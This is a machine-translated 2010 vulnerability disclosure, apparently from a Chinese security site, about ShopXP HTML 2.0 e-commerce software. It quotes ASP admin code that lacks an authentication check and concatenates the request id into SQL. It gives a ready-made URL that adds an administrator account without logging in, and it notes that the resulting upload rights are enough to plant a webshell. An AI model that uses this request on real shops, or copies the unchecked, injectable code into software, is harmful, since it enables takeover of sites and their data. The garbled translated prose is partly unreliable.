shopxp html version 2. 0 direct add administrator vulnerability-vulnerability warning-the black bar safety net

2010-10-11T00:00:00
ID MYHACK58:62201028081
Type myhack58
Reporter 佚名
Modified 2010-10-11T00:00:00

Description

lan3a told me that he had sent out, it turns out I'm not the first one, the mad Khan.... and

Program: shopxp html version 2. 0, the 1.0 should also be the same there

Vulnerability: direct add administrator

Keywords: is not found the keyword was depressed

FROM http://www.st999.cn/blog BY wandering wind 2010/10/9

Program download address: http://www.codepub.com/software/SHOPXP-7615.html

<!--# include file="xp. asp" - > <% dim adminid,action action=request. QueryString("action") adminid=request. QueryString("id") if adminid="" then adminid=request("adminid") select case action case "save" set rs=server. CreateObject("adodb. recordset") rs. Open "select * from [shopxp_admin] where adminid="&adminid,conn,1,3

....................................

rs. Update rs. Close set rs=nothing response. Write "<script language=javascript>alert('operation successful!'); history. go(-1);</script>" case "del" conn. execute "delete from [shopxp_admin] where adminid in ("&adminid&")" 'response. Redirect "manageuser. asp" response. Redirect the request. servervariables("http_referer") end select %>

Call xp. asp:

<!--# include file="database_name. asp" - > <% dim conn,connstr,db startime=timer() db="../shopxp/"&dataname&"" 'database on error resume next 'try to connect the database to timeout, but can be enhancedSQL injectionfilter connstr = "Provider=Microsoft. Jet. OLEDB. 4. 0;Data Source=" & Server. MapPath(db) 'connstr="DBQ="+server. mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*. mdb)};" set conn=server. createobject("ADODB. CONNECTION") conn. open connstr %>

Hey, also is not to do the filtering and verification, then generates a direct add administrator vulnerability.

http://127.0.0.1:99/admin/savexpadmin.asp it? action=add&admin2=st999&password2=st999. cn&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1

Wherein the admin2 and password2 is to add the administrator username and password

Add the user while permissions are not the highest administrator privileges, but have to edit and upload images permissions, it is sufficient to take the shell.

As for holding the shell method I will not say, we all know.